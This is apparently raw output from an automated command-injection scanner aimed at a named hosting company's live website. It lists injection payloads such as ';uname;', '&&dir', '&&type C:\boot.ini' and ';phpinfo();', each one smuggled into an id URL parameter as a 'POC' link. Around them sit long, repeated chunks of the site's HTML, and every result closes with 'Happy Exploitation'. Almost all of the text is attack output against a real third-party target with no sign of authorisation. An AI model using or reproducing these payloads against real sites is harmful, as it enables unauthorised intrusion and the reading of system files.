[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC:
https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC:
https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;uname;
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC:
https://www.squirrelhosting.co.uk/ho...p?id=94;uname;[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC:
https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&dir
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC:
https://www.squirrelhosting.co.uk/ho...php?id=94&&dir[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC:
https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: &&type C:\boot.ini
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC:
https://www.squirrelhosting.co.uk/ho...hp?id=94&&type C:\boot.ini[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC:
https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo();
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC:
https://www.squirrelhosting.co.uk/ho...=94;phpinfo();[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC:
https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
